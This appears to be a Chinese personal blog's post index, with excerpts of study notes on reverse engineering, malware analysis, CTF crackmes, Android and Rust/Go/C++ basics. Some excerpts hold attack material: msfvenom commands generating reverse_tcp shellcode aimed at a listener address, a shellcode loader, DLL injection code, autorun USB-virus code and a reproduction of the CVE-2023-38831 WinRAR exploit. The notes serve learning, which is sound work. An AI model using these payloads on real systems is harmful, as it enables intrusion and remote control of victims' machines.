Android反调试
Android反调试12345678protected void onCreate(Bundle arg4){ ApplicationInfo v1=this.getApplicationInfo(); int v2=v1.flags&2; v1.flag2=v2; if(v2!=0){ Process.killProcess(Process.myPid()); }}
逆向工程核心原理读书笔记
《逆向工程核心原理》读书笔记CreateRemoteThread()myhack.dll:
1234567891011121314151617181920212223242526272829#include "windows.h"#include "tchar.h"#pragma comment(lib, "urlmon.lib") //链接urlmon.lib#define DEF_URL (L"http://www.naver.com/index.html")#define DEF_FILE_NAME (L"index.html")HMODULE g_hMod = NULL;DWORD WINAPI ThreadProc(LPVOID lParam){ TCHAR szPath[_MAX_PATH] = {0,}; if( !GetModuleFileName( g_hMod, szPath, MAX_PATH ) )//返回当 ...
Rust语言基础
Rust语言基础命令行输出12345fn main(){ let a=12; println!("a is {0}, a again is {0}",a); println!("{{}}");//输出大括号}
详细输出123456789#[derive(Debug)] //打印详细信息struct Rectangle{ width:u32, height:u32,}fn main(){ let rect1=Rectangle{width:30,height:50}; println!("rect1 is {:?}",rect1);//替换为{:#?}时输出带格式的输出}
命令行输入123456use std::io::stdin;fn main(){ let mut s ...
SMC技术实现
SMC技术实现丢Viisual Studio2022里报了俩错,不会修。丢Dev-C++不报错,但是Release版还保留着原变量名、函数名,搞不懂。
12345678910111213141516171819202122232425262728//flag{smc_is_good!}#include <cstdio>#include <windows.h>using namespace std;char input[50];unsigned long long encrypt[]={0x53e5e8325de5938b,0x57e5c0dede2de472,0x9b6ba65e9b6b0093,0x9b6ba15c9b6bac5f,0x9b6bbb5a9b6ba75d,0x9b6bad589b6bb35b,0x9b6b9f569b6ba359,0x9b6bb3549b6ba957,0x9b6ba7529b6b9f55,0x9b6baf509b6baf53,0x9b6be14e9b6ba451,0x35adc0dede16bd4f, ...
C++病毒技术
C++病毒技术病毒分析https://www.virscan.org
https://support.virustotal.com/hc/en-us
https://s.threadbook.com/
https://habo.qq.com/
Windows API编程U盘病毒文件、驱动器操作。
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354#include <Windows.h>char szAutoRun[]="[AutoRun] \\r\nopen=notepad.exe \\r\nshell\\open=打开(&O) \\r\nshell\\open\\Command=notepad.exe \\r\nshell\\explore=资源管理器(&X) \\r\nshell\\explore\\Command=notepad.exe \\r\nshellexecute=notepad.exe ...
恶意代码逆向分析基础详解读书笔记
恶意代码逆向分析基础详解读书笔记生成执行shellcodeMsfVenom12msfvenom -p windows/peterpreter/reverse_tcp LHOST=192.168.10.129 LPORT=4444 -f c #C语言版msfvenom -p windows/peterpreter/reverse_tcp LHOST=192.168.10.129 LPORT=4444 -f python #Python版
执行PE节中shellcodescdbg1scdbg.exe /f *.* #分析二进制文件*.*调用的WindowsAPI函数
.text节区12345678910111213141516171819202122#include <windows.h>#include <stdio.h>#include <stdlib.h>#include <string.h>int main(void){ void* alloc_mem; BOOL retval; HANDLE Thre ...
Go语言基础
Go语言基础入门代码结构1234567package mainimport "fmt"func main(){ fmt.Print("..."); fmt.Println("..."); return;}
语句123var i int;i=300;fmt.Print(i);
代码块12345if a>0{ //...}else{ /*...*/}
运算符基础运算符1234567891011package main;import( "fmt")func main(){ var m,n int; fmt.Scan(&m,&n); r1:=m+n;//不需var声明直接使用 fmt.Printf("%d+%d=%d\n",m,n,r1); return;};
指数运算123456result:=math.Pow(5,3) ...
C++查缺补漏
C++查缺补漏面向对象省略号参数12345678910111213141516#include <cstdarg>void OutputInfo(int num,...){ va_list arguments; va_start(arguments,num); while(num--){ char* pchData=va_arg(arguments,char*); int iData=va_arg(arguments,int); printf("%s\n",pchData); printf("%d\n",iData); }; va_end(arguments);};int main(void){ OutputInfo(2,"beijing",2008,"olympic games",2008); return 0;};
函数指针12345 ...
Android入门
Android入门快速上手1234567891011121314151617181920212223242526272829303132package com.zypc.javaandroiddemo;import androidx.appcompat.app.AppCompatActivity;import android.os.Bundle;import android.view.Gravity;import android.view.View;import android.view.View.OnClickListener;import android.widget.Button;import android.widget.EditText;import android.widget.Toast;public class MainActivity extends AppCompatActivity { @Override protected void onCreate(Bundle savedInstanceState) { supe ...
CVE-2023-38831漏洞
CVE-2023-38831漏洞下载文件https://github.com/b1tg/CVE-2023-38831-winrar-exploit
复现用WinRAR打开.rar文档,双击CLASSIFIED_DOCUMENTS.pdf文件,弹出计算器。
分析一级目录包括一个.pdf文件和一个目录,名称都为CLASSIFIED_DOCUMENTS.pdf。
目录中是命名为CLASSIFIED_DOCUMENTS.pdf.cmd的文件,内容为:
12calc.exe &CLASSIFIED_DOCUMENTS.pdf
利用用作者给出的Python脚本创建。